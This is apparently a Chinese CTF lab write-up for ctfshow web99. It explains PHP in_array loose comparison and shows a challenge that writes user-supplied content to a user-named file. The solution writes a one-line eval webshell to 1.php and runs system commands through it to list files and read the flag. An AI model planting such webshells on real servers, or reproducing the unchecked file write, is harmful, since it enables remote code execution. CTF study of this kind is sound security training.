[ctfshow web入门]web99 in_array的弱比较漏洞

信息收集

array_push(array, value):向数组最后的位置插入value

in_array(value, array, type):其中value是要查找的值,array是需要查找的的数组,type是查找的类型,如果没有指定类型,则以弱比较方式查找

in_array存在一个弱比较漏洞,也就是当type设置时,且value的类型与数组数据内容类型不同时,value会被转化为数组数据的类型。此时如果value是字符串,而array数据类型是int,那么字符串会被转化为int

php 复制代码
highlight_file(__FILE__);
// 生成一个数组
$allow = array();
// 遍历 36 到 0x36d;0x36d = 877
// 向数组插入元素,随机数1到最多877
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
// 查询是否存在$_GET['n'],如果存在则以$_GET['n']为文件名写入$_POST['content']
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

解题

由于in_array未设置type,我们构造?n=1.php,此时in_array比较时,1.php被强制类型转化为int,也就是1,1大概率存在于数组中,此时我们向1.php写入一句话木马即可

s 复制代码
?n=1.php
post:
content=<?php eval($_GET[cmd]);?>

再访问我们的木马文件,获取目录和flag

s 复制代码
1.php?cmd=system('ls');
1.php?cmd=system('tac flag36d.php');

web    目录    web

相关推荐
Root_Hacker3 小时前
sql注入学习笔记
数据库·sql·web安全·网络安全·oracle·网络攻击模型
新缸中之脑4 小时前
Moltbook 帖子精选
开发语言·php
青岑CTF4 小时前
攻防世界-Web_php_include-胎教版wp
开发语言·安全·web安全·网络安全·php
遇见火星5 小时前
Linux综合性能监控工具dstat命令详解
linux·服务器·php·dstat
188号安全攻城狮6 小时前
【PWN】HappyNewYearCTF_9_ret2syscall
linux·汇编·安全·网络安全·系统安全
HaiLang_IT6 小时前
网络安全与执法专业【精选选题表】优质选题参考
安全·web安全·php
青岑CTF7 小时前
moectf2023-了解你的座驾-胎教版wp
安全·web安全·网络安全
刘婉晴8 小时前
【kali渗透测试】中间人攻击
网络安全·渗透测试
毕设源码-朱学姐8 小时前
【开题答辩全过程】以 基于python网络安全知识在线答题系统为例,包含答辩的问题和答案
开发语言·python·web安全
小李独爱秋8 小时前
计算机网络经典问题透视:RTS/CTS是强制使用还是选择使用?
网络协议·计算机网络·网络安全·信息与通信·信号处理